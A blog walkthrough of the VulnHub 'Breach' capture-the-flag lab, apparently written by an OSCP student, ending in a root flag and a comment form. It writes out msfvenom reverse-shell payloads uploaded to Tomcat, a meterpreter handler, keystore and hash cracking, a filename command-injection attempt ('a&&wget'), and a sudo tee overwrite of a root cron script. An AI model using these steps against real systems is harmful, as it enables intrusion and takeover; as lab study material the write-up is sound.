First we start with a nmap scan but it took really too long to enumerate it,
So i tried browsing to the ip and found a website there so i started nikto and dirb

Decoding this string in base64 gives us


#TODO Where is the pcap located on the website

From checking the source code of the web application i found a strange string that looked like base64 and it gave me a user/password to login into the impresscms

when i found the keystore i downloaded a tool to bruteforce the password because i needed the private key to be in a differente, to be able to export it in wireshark to decrypt the pcap

While this worked i tried to be smart about it and did a string on the keyfile wich revealed the word “tomcat” so i tried it as password and it worked!

after finding the password is tomcat

keytool -importkeystore toretype JKS -deststoretype PKCS12 -destkeystore keystore.p12
export the private key from the p12
openssl pkcs12 -in keystore.p12 -nocerts -out privatekey.pem
openssl rsa -in privatekey.pem -out keyout.pem
This decrypt the pcap

Authorization Basic

After searching a LONG time on how to connect to the tomcat service, firefox doesnt work netcat either i found out you can do that with openssl

openssl s_client -connect
After debugging the openssl for hours i decided to try with another browser than firefox, i was able to reach the tomcat server with edge!

We can login with the credentials found in the pcap

Because we are admin of the tomcat we can upload a malicious file

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f war -o /root/Dropbox/Vulnhub/Breach/shell.war
jar -xvf shell.war # to see name of jsp to call

inflated: zhawsspalj.jsp
nc -lvp 443

sfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -f elf breachmeter.elf

While enumerating the system i found there isnt a root password for mysql, so i dumped all the database, and found the md5 hash for the user milton

submitting this hash to crackstation revealed the password is thelaststraw

checking the logs on this server revealed
Jul 5 06:39:01 Breach CRON[2985]: (root) CMD (/usr/share/cleanup/

After trying to inject bash command into the script because i control the destination i found a way to bypass the script so it doesnt delete my file because he doesn’t handle space.
I tried injecting command with a filename like a&&wget so the command that would pass into th shell would be
rm -rf swingline/a&&get wich would execute the command.

I banged my head for about two days trying to exploit via this method
I found something usefull on the internet on how to inject arguments without spaceuo
Even this didn’t work so i did what i had learned best while doing my oscp, Try Harder! (If you are stuck somwhere restart your enumeration from scratch)
While restarting my enumeration i came across a comment in one of the images of the website while running exiftool on it.

It had the comment “cofeestains”
From remembering my enumeration i knew there was another user on the system that didn’t seems to interract with it (no trace of him in the logs and nothing in his home directory) his name is blumbergh. I had already tried some basics passwords on the account, but this time i tried with the new information.

su blumbergh // coffeestains

I was in!

Since i though he was the server administrator because he wouldnt need to write anything in his home directory if we can be root.

sudo -l
User blumbergh may run the following commands on Breach:
(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/

Okay we dont have all the sudo privilege but we can modify!

cat /tmp/ | sudo tee /usr/share/cleanup/
from now we just wait for a connection with our metasploit handler.

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp

we then get a shell as root! Finally 🙂

root@Breach:/root# cat .flag.txt
cat .flag.txt

______ _ __ _____ _____ _ _____ _
| ___ \ | | / | | _ | |_ _| | | ___| | |
| |_/ /_ __ ___ __ _ ___| |__ `| | | |/’ |______| | | |__ ___| |__ _ __ __| |
| ___ \ ‘__/ _ \/ _` |/ __| ‘_ \ | | | /| |______| | | ‘_ \ / _ \ __| ‘_ \ / _` |
| |_/ / | | __/ (_| | (__| | | || |_\ |_/ / | | | | | | __/ |__| | | | (_| |
\____/|_| \___|\__,_|\___|_| |_\___(_)___/ \_/ |_| |_|\___\____/_| |_|\__,_|

Congrats on reaching the end and thanks for trying out my first #vulnhub boot2root!

Shout-out to knightmare, and rastamouse for testing and g0tmi1k for hosting.


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s